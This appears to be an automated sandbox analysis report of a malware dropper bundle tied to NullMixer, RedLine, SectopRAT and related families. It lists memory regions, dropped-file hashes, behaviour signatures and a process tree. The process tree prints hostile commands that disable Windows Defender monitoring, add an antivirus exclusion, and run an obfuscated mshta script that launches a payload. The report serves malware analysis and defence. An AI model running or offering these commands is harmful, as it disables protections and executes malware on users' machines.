memory/2012-216-0x0000000005CC0000-0x00000000062D8000-memory.dmp
memory/2012-218-0x00000000057C0000-0x00000000057FC000-memory.dmp
memory/4816-215-0x00000000056C0000-0x00000000056D2000-memory.dmp
memory/1840-220-0x000000006DB10000-0x000000006DB5C000-memory.dmp
memory/1840-231-0x00000000076D0000-0x0000000007773000-memory.dmp
memory/4944-232-0x000000006DB10000-0x000000006DB5C000-memory.dmp
memory/4944-243-0x00000000077E0000-0x0000000007E5A000-memory.dmp
memory/1840-248-0x00000000078A0000-0x00000000078AA000-memory.dmp
memory/1840-249-0x0000000007A90000-0x0000000007B26000-memory.dmp
memory/4944-244-0x0000000006E80000-0x0000000006E9A000-memory.dmp
memory/4944-250-0x0000000007340000-0x0000000007351000-memory.dmp
memory/1840-230-0x0000000006AB0000-0x0000000006ACE000-memory.dmp
memory/1516-251-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/4944-256-0x0000000007380000-0x0000000007394000-memory.dmp
memory/4944-268-0x0000000007460000-0x0000000007468000-memory.dmp
memory/4944-267-0x0000000007470000-0x000000000748A000-memory.dmp
memory/4296-282-0x0000000003230000-0x0000000003420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TfSay.w
| MD5 | 8649bd267357309e3ceaf325ef72ee1e |
| SHA1 | 7ea28d42e186163a536cdd276aafac6bf1ec9a2e |
| SHA256 | 98b9eb7f7bdab1e321d89320bbf37c6dd2f27a133c6886931a05dde265fbdfe1 |
| SHA512 | 4bf603a2a08e241041910b6e812f3786f8ee5abeb4932f06aee7cf67ad39dba02937bb4b34a8d886ac6c98d419445ed06dd6c0df4dd6393f5ec0c70a30d3747b |
C:\Users\Admin\AppData\Local\Temp\rqC~~.A
| MD5 | 32ec5a7f8e578bbb6142b3c7972b5e3e |
| SHA1 | dc335867f93b0e9e2f1d20ce520bb143789d733c |
| SHA256 | 7d828c11e69048323472ea71f6fd00bc26d6453ecb5f8972cf584d42a5748ec7 |
| SHA512 | 042457ce38a4a3f2378827030a232192cda2e072a1e9761a71d85ad01c030a78f0e3f11f78b118d778a9f49822efd30b1d4cddf124375cd47c9dab0cab9602ff |
C:\Users\Admin\AppData\Local\Temp\F3U_R.J
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/4920-283-0x0000000000400000-0x0000000002F22000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da16367083d29b4efb1510cec1bc787f |
| SHA1 | 59b6161c47cc8007610d8ada36e42e3bf4c6730c |
| SHA256 | 9d300d18285835f72f1df4c34dcefe6834b88627aa33bad03a5860e66a9dcb96 |
| SHA512 | 4d8b6a4627d2ce0355ae8ae181162a1fdc9aaa120b613606abe0e511a0fac7d337b209b4ee69a33a63fc3b77d2e8dbe27e3175951a3156f9f56e42b3d60bff10 |
memory/1840-252-0x0000000007A50000-0x0000000007A5E000-memory.dmp
memory/1840-219-0x0000000006AD0000-0x0000000006B02000-memory.dmp
memory/2012-214-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19d1fc7d2654d7a.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4816-209-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4944-130-0x0000000005870000-0x0000000005BC4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/3968-123-0x0000000000D20000-0x0000000000D38000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbidq42o.lrl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4536-284-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/1840-113-0x0000000005E40000-0x0000000005EA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/404-109-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1840-105-0x0000000005550000-0x0000000005572000-memory.dmp
memory/4296-285-0x00000000037D0000-0x0000000003875000-memory.dmp
memory/4944-89-0x0000000005160000-0x0000000005788000-memory.dmp
memory/4296-289-0x0000000003880000-0x0000000003912000-memory.dmp
memory/4296-286-0x0000000003880000-0x0000000003912000-memory.dmp
memory/1584-290-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2212-78-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2212-77-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2212-76-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2212-74-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2212-73-0x00000000007F0000-0x000000000087F000-memory.dmp
memory/2520-300-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2212-79-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4296-322-0x0000000003230000-0x0000000003420000-memory.dmp
memory/4920-321-0x0000000000400000-0x0000000002F22000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 80aaca2f3c92e76b0955b1994e870d2b |
| SHA1 | ab262579f2f220dfa830f02ebccfbd6cde2b34ef |
| SHA256 | 14edecb3a5f24d3e1ceb9bc23c941201637746751191d46926121fbec53248aa |
| SHA512 | e7178bfd7397c5ea7a273c5cad45e965a88f38b5d98dcb0fcd549b31553060a942d935e181027e9a3a58dde34674d140ddaeb82634aed37e18e90d0cc9d07cbf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 387159609c7681169f3caee879a7aed5 |
| SHA1 | c9edb92b0b5afd4dc4fc48271e8e52447b466451 |
| SHA256 | a1f1245f2548f1c170a842b889a87694aa68277e07a4302e66f4af64944c2eb8 |
| SHA512 | 2077f634f9eec4f759445abc98c6454b1983b2b65c8d70a8f2d38c662f120662b7a480a5d5e37f40f05c527bbe5099adfd05d4c6b7d3117c858d6127edf33454 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\0c878a22-07ff-4697-8321-8276b2144a05.tmp
| MD5 | 8d2a482d36c06f53e4816feb13065a68 |
| SHA1 | 5c7d3ff4ec82676313f61adda9fc45a6b42fef8e |
| SHA256 | ac057ddfc1105dc56f515676a71033100308979b1a97546db359577df51780ee |
| SHA512 | d701a9f3fdc42da5c2eca69e070ad8bac2a97d406f68b14e20118b67c3f676eace0070fd93e021054a528203214f5664fa3533dd3052693fa6b1831a728083b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9c44c2faeefda884c93043fcdaf32086 |
| SHA1 | 18f714f743d9b9241254d689b3bda72e667efdcd |
| SHA256 | ce04396fe1a2db49bcb24385729462b197c4a9f598faa2fb850d072575820d99 |
| SHA512 | 4686d0626895514e1756fbe9751951551e25600e89ee08b9cc6d34f4d4533584b62e2d4d5d5d8399ec4e937e73ad6832e81aefeeb0e8b5aa0df46fbf056f2a3c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f2ec0f11ad71a19ff429683e8634bb42 |
| SHA1 | 622784701f7526e5886bf79df3a4709d0cdaa7f2 |
| SHA256 | f8cee2fae12f3620eb73e277aaa886b89aee1d836bcd2ecec1c7434fc36ed414 |
| SHA512 | 1cd0900d63923fafd034330d18503df66fd853eadaf8e22fe7f6c3ceb2d4d209ab808fa07a8888502a83cc2c6291514abf38d2505f9882aca8108c80fb419e09 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0d54bacb2e4b4c893e2f17dac6895d00 |
| SHA1 | eefdd0e31464fe13b8303393d71261e69d8aa275 |
| SHA256 | 5eeb2e1d5597cb2e6fd5d41109a804f04cec7f1bc8cb5fcced9ce230ed5ecbf3 |
| SHA512 | 8cdc65d7b77269d75420d40954b733a832c94c957e1e625d3aefa2c752b71d151f4d891e3aa9602be475e01dbd3a72ab52623434078f2e4cbe756c2e6064d4a1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 799369fa87f824a5400cda941003a1f3 |
| SHA1 | 0444bd892dadff101838309ab84bd85db5ddd88f |
| SHA256 | 1a36055d2fd545f69d849e15e81aca7497734e80da54be45782106bcf2e10400 |
| SHA512 | 4f8ef9f4f18d4f1b3cf131c4c528ae0a370993f9eeb7dec0b91d7d379d4bcea2be5300802ddb0418b9e110ba86430d695e94651f9d66359894cbd90c26502cf1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | be6585ee90570bbc7498413f7a13a80e |
| SHA1 | ee35d02aca7966a2a2fb2505a6447e22fc06528e |
| SHA256 | 3fc338eb10b1c031abc65fa76261b494dbdcf61e370fe3006f5ce1087343576d |
| SHA512 | 4f746626e5504eff9024d4e7b1f7b9e9e6c94d4edb93a755525375e5b4d5d470da52823be49bc02616722eb45c1c8828c69477a0231559d7b88bc64e5be40103 |
memory/4296-413-0x0000000003880000-0x0000000003912000-memory.dmp
memory/4296-414-0x0000000003920000-0x000000000451B000-memory.dmp
memory/4296-415-0x0000000004520000-0x00000000045AB000-memory.dmp
memory/4296-416-0x00000000045B0000-0x0000000004637000-memory.dmp
memory/4296-419-0x00000000045B0000-0x0000000004637000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\77fa9b46-2438-4487-9265-e1f2cedef883.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240729-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2176 set thread context of 1692 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe |
| PID 872 set thread context of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe |
| PID 2708 set thread context of 1552 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe
Wed09a48dab921a3bda7.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe
Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 272
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$8018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe
Wed0961d5d40c7b937c7.exe
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe
Wed09f3b13c770637f.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$9018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
